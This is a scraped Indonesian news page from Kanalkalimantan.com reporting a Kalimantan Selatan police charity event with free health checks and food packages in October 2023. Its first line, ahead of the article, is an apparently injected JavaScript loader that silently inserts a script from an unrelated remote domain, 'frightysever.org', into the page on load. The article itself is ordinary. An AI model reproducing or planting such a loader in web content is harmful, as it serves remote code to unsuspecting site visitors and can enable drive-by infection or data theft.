(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kalimantan Selatan

Cek Kesehatan dan Sembako Gratis “32 Tahun Pengabdian Akabri 91” di Kalsel


KANALKALIMANTAN.COM, BANJARBARU – Ribuan warga Provinsi Kalimantan Selatan (Kalsel) antusias menyerbu pelayanan kesehatan hingga pasar murah dan sembako gratis yang dibagikan Polda Kalsel, Sabtu (21/10/2023).

Polda Kalsel melaksanakan kegiatan bakti kesehatan dan bakti sosial memeriahkan peringatan 32 tahun pengabdian Akabri Angkatan 91.

Kegiatan digelar serentak oleh jajaran Polri hari ini, Polda Kalsel melaksanakan kegiatan di Auditorium Universitas Lambung Mangkurat (ULM) Banjarbaru.

Baca juga: LAPOR HSU Terima 62 Aduan Masyarakat per 1 Januari-20 Oktober

Lima ribu paket sembako senilai Rp180 ribu dibagikan gratis, ada lima ribu paket bahan pokok yang dijual murah di stan bertajuk Pasar Murah Akabri itu.

Pelayanan kesehatan juga diberikan oleh ratusan tenaga kesehatan yang bekerja sama dengan Bidang Kedokteran Kesehatan (Biddokkes) Polda Kalsel.

Kapolda Kalsel Irjen Pol Andi Rian, salah satu Alumni Akabri 91 mengatakan, dengan fasilitas tempat yang diberikan ULM, pihaknya memberikan pelayanan kesehatan umum hingga spesialis kepada masyarakat.

“Termasuk dokter spesialis dan juga ada benar bedah minor, sunatan massal dan juga donor darah, dan dinas-dinas terkait telah membantu menyediakan bahan-bahan di pasar murah,” ujar Kapolda Kalsel.

Dirinya mendapati banyak harapan dari masyarakat Kalsel yang menginginkan kegiatan ini dapat dilaksanakan secara berkelanjutan.

“Semoga kegiatan yang sifatnya sosial ini bisa dirasakan manfaatnya oleh masyarakat, semoga kita bisa mewujudkan keinginan masyarakat yang ingin kegiatan ini tidak hanya berhenti sampai di sini saja,” harap dia.

Baca juga: MUI HSU Sambut Hangat Silaturahmi MUI Batola

Bakti sosial ini pun, sambung dia dilaksanakan beriringan dengan peresmian program bedah rumah yang sudah siap huni sebanyak 10 buah di Kabupaten Tanah Laut.

“Kita juga menyelesaikan penyerahan bantuan sumur bor di 12 titik di kabupaten kota dan tambahan 19 tandon yang ditujukan ke daerah-daerah yang tidak bisa dibangun sumur untuk menampung air bersih,” sebutnya.

Kehadiran warga ini diketahui datang dari berbagai kabupaten dan kota di Kalsel, seperti Kabupaten Tanah Laut hingga Kabupaten Banjar.

Mereka berjubel mengantre mengambil paket sembako dan pelayanan kesehatan gratis membuat panitia hampir kewalahan.

Salah satu warga yang mendapat hibah sumur bor sekaligus sembako, Mubin mengatakan senang atas segala bantuan yang telah diberikan oleh Polda Kalsel.

Baca juga: Korban Puting Beliung di Gambut Terima Bantuan dari Relawan Gabungan

“Saya hanya bisa mengucapkan terima kasih? semoga apa yang dilakukan oleh Polda Kalsel menjadi motivasi agar bisa memberikan pelayanan yang terbaik bagi warga masyarakat dalam artian program ini dapat terus berlangsung,” ucap Mubin.

Polda Kalsel turut memberikan doorprize berup 15 buah kipas angin dan masing 7 unit blender, rice cooker, mesin cuci, kompor gas, dispenser, kulkas, sepeda motor dan paket umrah. (Kanalkalimantan.com/wanda)

Reporter : wanda
Editor : bie


Muhammad Andi

Recent Posts

Kali Pertama Airbus A340 Layani Jemaah Haji Embarkasi Banjarmasin

Penerbangan Kloter 1 Sempat Terlambat 30 Menit Read More

2 jam ago

100 Peserta Ramaikan Kejuaraan Catur se Kalteng Piala Pj Bupati Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Kejuaraan catur piala Pj Bupati Kapuas se Kalimantan Tengah dibuka oleh… Read More

5 jam ago

Embarkasi Haji Banjarmasin Berangkatkan Kloter 1, 320 Jemaah Menuju Madinah

KANALKALIMANTAN.COM, BANJARBARU - Jemaah haji Kloter pertama diberangkatkan dari Asrama Haji Embarkasi Banjarmasin di Banjarbaru,… Read More

5 jam ago

Dilakban di Paha, Empat Orang di Bandara Juwata Tarakan Selundupkan 4 Kg Sabu

KANALKALIMANTAN.COM, TARAKAN - Empat orang calon penumpang pesawat dengan rute Tarakan-Makassar batal berangkat lantaran kedapatan… Read More

19 jam ago

Satgas TMMD Bikin Sumur Bor untuk Warga Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pengerjaan sumur bor menjadi salah satu sasaran fisik program TNI Manunggal Membangun… Read More

21 jam ago

Jemaah Termuda Kloter 1 Daftar Haji saat Umur 10 Tahun, Setor 2014 Berangkat 2024

KANALKALIMANTAN.COM, BANJARBARU - Berangkat haji ke Baitullah menunaikan Rukun Islam kelima sepenuhnya adalah panggilan. Berusia… Read More

24 jam ago

This website uses cookies.